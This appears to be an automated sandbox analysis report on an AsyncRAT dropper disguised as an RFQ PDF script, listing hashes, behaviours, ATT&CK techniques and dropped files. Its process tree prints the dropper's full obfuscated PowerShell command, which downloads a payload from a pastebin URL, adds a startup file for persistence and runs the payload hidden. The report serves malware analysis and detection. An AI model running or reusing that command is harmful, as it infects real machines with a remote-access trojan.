asyncrat | 3afff94321f5f55b992d98b50e8af2046d473094a1e1e0611ccddb9bde659fa7

General

Target

RFQ_115A087_202104_20_Urgent_pdf.vbs
Size

5KB
MD5

b36e32526b42e2fb17c93fb9f839bca2
SHA1

eb243b06b6e10ddc227018cc1b4d98209e93beed
SHA256

3afff94321f5f55b992d98b50e8af2046d473094a1e1e0611ccddb9bde659fa7
SHA512

00aaa35901b7dd8fe8aefb22e4ba40d61550984cfe66d1b893651f65b8b0c4cc76f9f36d713e6ce52241d055fc2b01dce880c9fe0b9e4602599fb9113ac5837c

Score

10^/10

asyncrat rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://pastebin.com/raw/1grXhFpU

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/3848-194-0x000000000040C7BE-mapping.dmp	asyncrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

10 2504 powershell.exe
Drops startup file 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin32Bits89.vbs powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2108 set thread context of 3848 2108 powershell.exe InstallUtil.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

2504 powershell.exe
2504 powershell.exe
2504 powershell.exe
2108 powershell.exe
2108 powershell.exe
2108 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2504 powershell.exe
Token: SeDebugPrivilege 2108 powershell.exe

flow	pid	process
10	2504	powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin32Bits89.vbs	powershell.exe

description	pid	process	target process
PID 2108 set thread context of 3848	2108	powershell.exe	InstallUtil.exe

pid	process
2504	powershell.exe
2504	powershell.exe
2504	powershell.exe
2108	powershell.exe
2108	powershell.exe
2108	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2504	powershell.exe
Token: SeDebugPrivilege	2108	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

WScript.exepowershell.exepowershell.execsc.exe

description	pid	process	target process
PID 3896 wrote to memory of 2504	3896	WScript.exe	powershell.exe
PID 3896 wrote to memory of 2504	3896	WScript.exe	powershell.exe
PID 2504 wrote to memory of 2108	2504	powershell.exe	powershell.exe
PID 2504 wrote to memory of 2108	2504	powershell.exe	powershell.exe
PID 2108 wrote to memory of 1828	2108	powershell.exe	csc.exe
PID 2108 wrote to memory of 1828	2108	powershell.exe	csc.exe
PID 1828 wrote to memory of 1924	1828	csc.exe	cvtres.exe
PID 1828 wrote to memory of 1924	1828	csc.exe	cvtres.exe
PID 2108 wrote to memory of 3848	2108	powershell.exe	InstallUtil.exe
PID 2108 wrote to memory of 3848	2108	powershell.exe	InstallUtil.exe
PID 2108 wrote to memory of 3848	2108	powershell.exe	InstallUtil.exe
PID 2108 wrote to memory of 3848	2108	powershell.exe	InstallUtil.exe
PID 2108 wrote to memory of 3848	2108	powershell.exe	InstallUtil.exe
PID 2108 wrote to memory of 3848	2108	powershell.exe	InstallUtil.exe
PID 2108 wrote to memory of 3848	2108	powershell.exe	InstallUtil.exe
PID 2108 wrote to memory of 3848	2108	powershell.exe	InstallUtil.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ_115A087_202104_20_Urgent_pdf.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:3896

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WINDOWSTYLE HIDDEN -EXECUTIONPOLICY UNRESTRICTED -COMMAND IEX ([System.Text.Encoding]::UTF8.GetString(@(35,82,101,97,100,32,67,111,110,116,101,110,116,32,79,102,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,33,13,10,91,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,93,32,36,83,116,114,101,97,109,32,61,32,40,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,79,112,101,110,82,101,97,100,40,34,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,49,103,114,88,104,70,112,85,34,41,13,10,91,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,82,101,97,100,101,114,93,32,36,83,82,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,82,101,97,100,101,114,32,36,83,116,114,101,97,109,13,10,91,83,116,114,105,110,103,93,32,36,82,101,113,32,61,32,36,83,82,46,82,101,97,100,84,111,69,110,100,40,41,13,10,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,54,48,48,48,41,13,10,13,10,35,67,114,101,97,116,101,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,79,110,32,72,97,114,100,32,68,105,115,107,32,33,13,10,91,83,116,114,105,110,103,93,32,36,84,69,77,80,32,61,32,36,101,110,118,58,84,69,77,80,32,43,32,34,92,34,32,43,32,34,83,121,115,84,114,97,121,46,80,83,49,34,13,10,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,36,84,69,77,80,44,32,36,82,101,113,41,13,10,13,10,35,83,116,97,114,116,117,112,32,73,110,115,116,97,108,108,97,116,105,111,110,13,10,70,117,110,99,116,105,111,110,32,73,78,83,84,65,76,76,40,41,32,123,13,10,32,32,32,32,91,83,116,114,105,110,103,93,32,36,86,66,83,82,117,110,32,61,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,68,101,102,97,117,108,116,46,71,101,116,83,116,114,105,110,103,40,64,40,56,51,44,49,48,49,44,49,49,54,44,51,50,44,55,57,44,57,56,44,49,48,54,44,51,50,44,54,49,44,51,50,44,54,55,44,49,49,52,44,49,48,49,44,57,55,44,49,49,54,44,49,48,49,44,55,57,44,57,56,44,49,48,54,44,49,48,49,44,57,57,44,49,49,54,44,52,48,44,51,52,44,56,55,44,56,51,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,44,52,54,44,56,51,44,49,48,52,44,49,48,49,44,49,48,56,44,49,48,56,44,51,52,44,52,49,44,49,51,44,49,48,44,55,57,44,57,56,44,49,48,54,44,52,54,44,56,50,44,49,49,55,44,49,49,48,44,51,50,44,51,52,44,56,48,44,49,49,49,44,49,49,57,44,49,48,49,44,49,49,52,44,56,51,44,49,48,52,44,49,48,49,44,49,48,56,44,49,48,56,44,51,50,44,52,53,44,54,57,44,49,50,48,44,49,48,49,44,57,57,44,49,49,55,44,49,49,54,44,49,48,53,44,49,49,49,44,49,49,48,44,56,48,44,49,49,49,44,49,48,56,44,49,48,53,44,57,57,44,49,50,49,44,51,50,44,56,50,44,49,48,49,44,49,48,57,44,49,49,49,44,49,49,54,44,49,48,49,44,56,51,44,49,48,53,44,49,48,51,44,49,49,48,44,49,48,49,44,49,48,48,44,51,50,44,52,53,44,55,48,44,49,48,53,44,49,48,56,44,49,48,49,44,51,50,44,51,52,44,51,50,44,51,56,44,51,50,44,51,52,44,51,55,44,55,48,44,49,48,53,44,49,48,56,44,49,48,49,44,56,48,44,57,55,44,49,49,54,44,49,48,52,44,51,55,44,51,52,44,52,52,44,51,50,44,52,56,41,41,13,10,32,32,32,32,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,40,91,83,121,115,116,101,109,46,69,110,118,105,114,111,110,109,101,110,116,93,58,58,71,101,116,70,111,108,100,101,114,80,97,116,104,40,55,41,32,43,32,34,92,83,121,115,116,101,109,76,111,103,105,110,51,50,66,105,116,115,56,57,46,118,98,115,34,41,44,32,36,86,66,83,82,117,110,46,82,101,112,108,97,99,101,40,34,37,70,105,108,101,80,97,116,104,37,34,44,32,36,84,69,77,80,41,41,13,10,125,13,10,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,49,48,48,48,41,13,10,13,10,35,82,117,110,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,33,13,10,73,78,83,84,65,76,76,13,10,73,69,88,32,34,80,111,119,101,114,83,104,101,108,108,46,101,120,101,32,45,87,105,110,100,111,119,83,116,121,108,101,32,72,105,100,100,101,110,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32,36,84,69,77,80,34)))
2⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2504

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File C:\Users\Admin\AppData\Local\Temp\SysTray.PS1
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2108

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\awr4t0b1\awr4t0b1.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1828

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5058.tmp" "c:\Users\Admin\AppData\Local\Temp\awr4t0b1\CSCDBC15537B5B44F3A829DC8056A27834.TMP"
5⤵
PID:1924

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
4⤵
PID:3848

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
5626c497c0e86c30a66047154bc10781

SHA1
ff3a384738ac4b04808296f5aaf73044e2dcf2e1

SHA256
00b535a8e4d419905d017d78bc162b575d2b74d9825b89ccbaed85de3602125b

SHA512
921ef32367c46f399b6abbee99d0acc96a3c4b76701c641a479b48119f3e91dcd6d4e88f1ef4ee21cb7ea3ea4d623f8c5e011ce3f0bc9b11082734fc76016a04

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
9cb3f637df41c203ec740badffb115ff

SHA1
e44b5c2584dced253b29ba854b085f4bf62f2c02

SHA256
729de0a5fe40d9f232ab199ff7ef6646a57666fab149985ef15a0e47be057444

SHA512
e3f0d046a2ff5e0451e53254fcd318222aa7eb711e7c2ec7b432421476b092bd0ce18fe4a72a6549fe547138c22654e9e5d43282113fb27c12cfa38ec7250458

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5058.tmp
MD5
e5ec6be53525f6bda5b6f1b92251331a

SHA1
8adee80b0c0fa546eb7379a7dbe0494899754eef

SHA256
4a9623643f1a9e43bfde2d4a93f12feae2c65c86a4a958b1ab332e21cc33541f

SHA512
ffa8351992131a3ff5e5b3eb20a7e8c610332ec16b9bf8a5d85df3eda550efabe4013750e6f2829434c8981b88905e8363fe5009f0141356f3ead375df36fd23

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysTray.PS1
MD5
17f6a9dc029e40529947825a71a4b69f

SHA1
140d9fa2ec0d48dab4164bd41e5df5c2bc0b5661

SHA256
61b335f21eb74fdff0d12516e7995be1196807ac3b6f4fb0d5dc40a27cb19462

SHA512
3d36931830bea94476817bdaaf46645fa6d7109358bd4906d5dd6de9d429b788ad1d27d76a9830e9ec97541a8a9123727902821fb857690257790db3d868cb18

Download Submit
C:\Users\Admin\AppData\Local\Temp\awr4t0b1\awr4t0b1.dll
MD5
9c3233a69c5a758d5fea57eb3e3465db

SHA1
e215ce4d3a4aaa30ce564550e914af734fc3fecf

SHA256
c48d8936ec050235aa4fc5216f2447656f6f6e9e2359c53066bd377f221ccc02

SHA512
0fa57216dbd558277e6f530a11fd8616d02c3985b1b438537cd613c9534d210b842d8ebaa35688ac3ea9d01d72123fbb2af9bf3da01547465f61f38c1a082ecc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\awr4t0b1\CSCDBC15537B5B44F3A829DC8056A27834.TMP
MD5
da95cf0a5cbd7d94feb405a808e5942f

SHA1
8c8749467e30a9955909e0d5021187ebb92e338b

SHA256
66be4d3c1b1944d34bca89ac4f5207cc08e0356c109ad306001f49c20bce6073

SHA512
97220de7310b1c20f4e7751d102dec2242a794f1b5e81355a5f859c459780c4b3c5a4d9da3632678a6abd3cad7c38d850dea9b01d4df1747e2fd25a352bb5e2b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\awr4t0b1\awr4t0b1.0.cs
MD5
e03b1e7ba7f1a53a7e10c0fd9049f437

SHA1
3bb851a42717eeb588eb7deadfcd04c571c15f41

SHA256
3ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427

SHA512
a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\awr4t0b1\awr4t0b1.cmdline
MD5
daa9b38e1dda1ecdcafea746c9fec303

SHA1
f81ebf3384a000db2a0c0f68eeb90ca1b45d1e7b

SHA256
ff4ffbe28d6ec447b792f15e03d7ff9e493c348fbbdcca829a2f746239655007

SHA512
c487be1cc726ba47d4fb8587036be35a1f1d0fbfa882a9a65af5d83e93cd0f5800bc0b650a1a8912d03e3c0ce2f382327cd372fa79fe24bdd4a05b9ff2e7defa

Download Submit
memory/1828-186-0x0000000000000000-mapping.dmp

Download
memory/1924-190-0x0000000000000000-mapping.dmp

Download
memory/2108-141-0x000001F945C50000-0x000001F945C52000-memory.dmp

Filesize
8KB

Download
memory/2108-142-0x000001F945C53000-0x000001F945C55000-memory.dmp

Filesize
8KB

Download
memory/2108-132-0x0000000000000000-mapping.dmp

Download
memory/2108-189-0x000001F945C56000-0x000001F945C58000-memory.dmp

Filesize
8KB

Download
memory/2504-131-0x000001E3740A6000-0x000001E3740A8000-memory.dmp

Filesize
8KB

Download
memory/2504-114-0x0000000000000000-mapping.dmp

Download
memory/2504-126-0x000001E374430000-0x000001E374431000-memory.dmp

Filesize
4KB

Download
memory/2504-119-0x000001E373ED0000-0x000001E373ED1000-memory.dmp

Filesize
4KB

Download
memory/2504-121-0x000001E3740A3000-0x000001E3740A5000-memory.dmp

Filesize
8KB

Download
memory/2504-120-0x000001E3740A0000-0x000001E3740A2000-memory.dmp

Filesize
8KB

Download
memory/3848-194-0x000000000040C7BE-mapping.dmp

Download
memory/3848-197-0x00000000053F0000-0x00000000053F1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing